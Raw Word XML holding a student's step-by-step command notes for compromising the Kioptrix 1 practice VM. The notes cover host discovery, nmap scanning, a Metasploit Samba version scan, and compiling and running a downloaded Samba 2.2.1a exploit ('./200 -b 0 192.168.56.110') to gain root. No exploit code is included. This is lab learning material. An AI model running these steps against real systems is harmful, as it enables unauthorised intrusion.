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FDB0" w14:textId="37563F69" w:rsidR="00A318A7" w:rsidRDefault="00E32B88">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1 Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB7744" w14:textId="52AB1031" w:rsidR="00E32B88" w:rsidRDefault="00E32B88"/>
    <w:p w14:paraId="5DFEF2CD" w14:textId="3456DF4F" w:rsidR="003B18C0" w:rsidRDefault="003B18C0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00E32B88">
        <w:t>etdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E32B88">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eth1 //to find hosts</w:t>
      </w:r>
      <w:r w:rsidR="00013CD3">
        <w:t xml:space="preserve"> (type ‘q’ to quit</w:t>
      </w:r>
      <w:r w:rsidR="00864F7F">
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00864F7F">
        <w:t>ctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00864F7F">
        <w:t>-shift-c to cut)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57567A13" w14:textId="1F5CED55" w:rsidR="00F94A28" w:rsidRDefault="00F94A28">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009539B0">
        <w:t>-p- -A [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009539B0">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009539B0">
        <w:t xml:space="preserve"> address]</w:t>
      </w:r>
      <w:r w:rsidR="00007E4D">
        <w:t xml:space="preserve"> //to map open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09A407" w14:textId="34705FAF" w:rsidR="00007E4D" w:rsidRDefault="00CB51EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  //open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08E4BBE3" w14:textId="4D9790BC" w:rsidR="00CB51EB" w:rsidRDefault="00C225C9">
      <w:r w:rsidRPr="00C225C9">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C225C9">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C225C9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C225C9">
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E6229">
        <w:t xml:space="preserve">  //to run auxiliary scanner to find samba version to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9849EC" w14:textId="2E57B128" w:rsidR="000E6229" w:rsidRDefault="00B336D1">
      <w:r>
        <w:t>set RHOST [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address]   //</w:t>
      </w:r>
      <w:r w:rsidR="00F85CB8">
        <w:t>to point RHOST to where to run scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14703F7D" w14:textId="0829A901" w:rsidR="00F85CB8" w:rsidRDefault="00F85CB8">
      <w:r>
        <w:t>run  //to start aux scanner</w:t>
      </w:r>
      <w:r w:rsidR="00292E4A">
        <w:t xml:space="preserve"> (in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00292E4A">
        <w:t>Kioptrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00292E4A">
        <w:t xml:space="preserve"> 1 machine, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0049053C">
        <w:t>Sanba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0049053C">
        <w:t xml:space="preserve"> 2.2.1a was found)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41454236" w14:textId="2C32DD3B" w:rsidR="0049053C" w:rsidRDefault="003E5ECA">
      <w:r>
        <w:t xml:space="preserve">/*then cut and paste </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sanba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version to Google search for exploits</w:t>
      </w:r>
      <w:r w:rsidR="0059421D">
        <w:t xml:space="preserve"> then cut paste raw code</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B27D53" w14:textId="51865180" w:rsidR="003E5ECA" w:rsidRDefault="00AA1149">
      <w:r>
        <w:t>exit //exit Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7AD321" w14:textId="29FDD26F" w:rsidR="00AA1149" w:rsidRDefault="0059421D">
      <w:r>
        <w:t>vi [name of file</w:t>
      </w:r>
      <w:r w:rsidR="00387CA8">
        <w:t xml:space="preserve"> (200.c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]  //create file for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFDF98" w14:textId="7EB7B610" w:rsidR="00F85CB8" w:rsidRDefault="00513D94">
      <w:r>
        <w:t>type ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="002F56D4">
        <w:t>//to enter interactive mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0757A" w14:textId="15ED8F28" w:rsidR="002F56D4" w:rsidRDefault="00207795">
      <w:r>
        <w:t>cut and paste raw code then ‘esc’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55999CFD" w14:textId="7120FC80" w:rsidR="00207795" w:rsidRDefault="00D6602D">
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //to quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983A4E7" w14:textId="297D5B52" w:rsidR="007F58C9" w:rsidRDefault="00387CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [file name 200.c] -o </w:t>
      </w:r>
      <w:r w:rsidR="008A1825">
        <w:t>[executable file name (200)] //to compile exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492521FE" w14:textId="2E3A8883" w:rsidR="008A1825" w:rsidRDefault="00F94C36">
      <w:r>
        <w:t>./[exec file name (200)]</w:t>
      </w:r>
      <w:r w:rsidR="00CC6EA0">
        <w:t xml:space="preserve">  //to see what switches the exploit will do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693E142" w14:textId="522FD1E2" w:rsidR="00CC6EA0" w:rsidRDefault="00C34419">
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="00B03AAB">
        <w:t>200 -b 0 192.168.56.110   //to run brute force -b switch to see if worked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F939B0E" w14:textId="25B72B72" w:rsidR="00B03AAB" w:rsidRDefault="003502EB">
      <w:r>
        <w:t>Type ‘hostname’ to see if in vuln machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A6A49" w14:textId="2B51DD75" w:rsidR="003502EB" w:rsidRDefault="000606C7">
      <w:r>
        <w:t xml:space="preserve">cd /root     //to </w:t>
      </w:r>
      <w:r w:rsidR="00EB5E5F">
        <w:t xml:space="preserve">change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB5E5F">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB5E5F">
        <w:t xml:space="preserve"> to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9AC3D" w14:textId="743A0405" w:rsidR="00EB5E5F" w:rsidRDefault="00EB5E5F">
      <w:r>
        <w:t>ls  //to list root files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B929D3" w14:textId="70E22C76" w:rsidR="00EB5E5F" w:rsidRDefault="004C12B5">
      <w:r>
        <w:t>////when done, you have root access on vuln machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0A48D" w14:textId="77777777" w:rsidR="004C12B5" w:rsidRDefault="004C12B5"/>
    <w:p w14:paraId="581DD70E" w14:textId="77777777" w:rsidR="008A1825" w:rsidRDefault="008A1825"/>
    <w:p w14:paraId="2B35FDB9" w14:textId="77777777" w:rsidR="00013CD3" w:rsidRDefault="00013CD3"/>
    <w:p w14:paraId="2EDACA03" w14:textId="67483232" w:rsidR="003B18C0" w:rsidRDefault="003B18C0"/>
    <w:p w14:paraId="07991341" w14:textId="6A692009" w:rsidR="00E32B88" w:rsidRDefault="003B18C0">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F7E9A" w14:textId="00889704" w:rsidR="00F20F97" w:rsidRDefault="00F20F97"/>
    <w:p w14:paraId="1316295B" w14:textId="77777777" w:rsidR="00F20F97" w:rsidRDefault="00F20F97"/>
    <w:sectPr w:rsidR="00F2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B"/>
    <w:rsid w:val="00007E4D"/>
    <w:rsid w:val="00013CD3"/>
    <w:rsid w:val="000458BB"/>
    <w:rsid w:val="000606C7"/>
    <w:rsid w:val="00077C61"/>
    <w:rsid w:val="000A20BE"/>
    <w:rsid w:val="000A4E23"/>
    <w:rsid w:val="000B60F5"/>
    <w:rsid w:val="000E6229"/>
    <w:rsid w:val="000E6BFD"/>
    <w:rsid w:val="001B062C"/>
    <w:rsid w:val="00207795"/>
    <w:rsid w:val="00292E4A"/>
    <w:rsid w:val="00296564"/>
    <w:rsid w:val="00296A19"/>
    <w:rsid w:val="002D3A2E"/>
    <w:rsid w:val="002E0139"/>
    <w:rsid w:val="002E2D3F"/>
    <w:rsid w:val="002E6BD2"/>
    <w:rsid w:val="002F56D4"/>
    <w:rsid w:val="003502EB"/>
    <w:rsid w:val="003507C8"/>
    <w:rsid w:val="003735D6"/>
    <w:rsid w:val="00387CA8"/>
    <w:rsid w:val="003B18C0"/>
    <w:rsid w:val="003C6330"/>
    <w:rsid w:val="003D1364"/>
    <w:rsid w:val="003E5ECA"/>
    <w:rsid w:val="0049053C"/>
    <w:rsid w:val="004C12B5"/>
    <w:rsid w:val="004C5A2A"/>
    <w:rsid w:val="00513D94"/>
    <w:rsid w:val="00537676"/>
    <w:rsid w:val="0056764E"/>
    <w:rsid w:val="0059421D"/>
    <w:rsid w:val="005A0162"/>
    <w:rsid w:val="006C39C5"/>
    <w:rsid w:val="006F13FA"/>
    <w:rsid w:val="00762D5A"/>
    <w:rsid w:val="00767EB5"/>
    <w:rsid w:val="007F58C9"/>
    <w:rsid w:val="00864F7F"/>
    <w:rsid w:val="00872A51"/>
    <w:rsid w:val="008A1825"/>
    <w:rsid w:val="0091488A"/>
    <w:rsid w:val="00941308"/>
    <w:rsid w:val="00953594"/>
    <w:rsid w:val="009539B0"/>
    <w:rsid w:val="00983E6C"/>
    <w:rsid w:val="00A215A5"/>
    <w:rsid w:val="00A23F75"/>
    <w:rsid w:val="00A318A7"/>
    <w:rsid w:val="00A55E8E"/>
    <w:rsid w:val="00A906D7"/>
    <w:rsid w:val="00AA1149"/>
    <w:rsid w:val="00AC0F03"/>
    <w:rsid w:val="00AF3B1C"/>
    <w:rsid w:val="00B03AAB"/>
    <w:rsid w:val="00B15ACE"/>
    <w:rsid w:val="00B336D1"/>
    <w:rsid w:val="00B45BA5"/>
    <w:rsid w:val="00B922EE"/>
    <w:rsid w:val="00BA3C6B"/>
    <w:rsid w:val="00BA7D27"/>
    <w:rsid w:val="00C023A6"/>
    <w:rsid w:val="00C1275C"/>
    <w:rsid w:val="00C225C9"/>
    <w:rsid w:val="00C2470D"/>
    <w:rsid w:val="00C34419"/>
    <w:rsid w:val="00C41989"/>
    <w:rsid w:val="00C50633"/>
    <w:rsid w:val="00C53CCB"/>
    <w:rsid w:val="00C70AFB"/>
    <w:rsid w:val="00CB51EB"/>
    <w:rsid w:val="00CC6EA0"/>
    <w:rsid w:val="00CF64C7"/>
    <w:rsid w:val="00D34AD6"/>
    <w:rsid w:val="00D6602D"/>
    <w:rsid w:val="00D909A4"/>
    <w:rsid w:val="00E32B88"/>
    <w:rsid w:val="00EB5E5F"/>
    <w:rsid w:val="00EC60E5"/>
    <w:rsid w:val="00ED386E"/>
    <w:rsid w:val="00F20F97"/>
    <w:rsid w:val="00F85CB8"/>
    <w:rsid w:val="00F94A28"/>
    <w:rsid w:val="00F94C36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1309"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C6463C9-E26F-4279-82FC-0286F78A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Windle</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ron Windle</cp:lastModifiedBy>
  <cp:revision>87</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-24T14:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-31T17:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>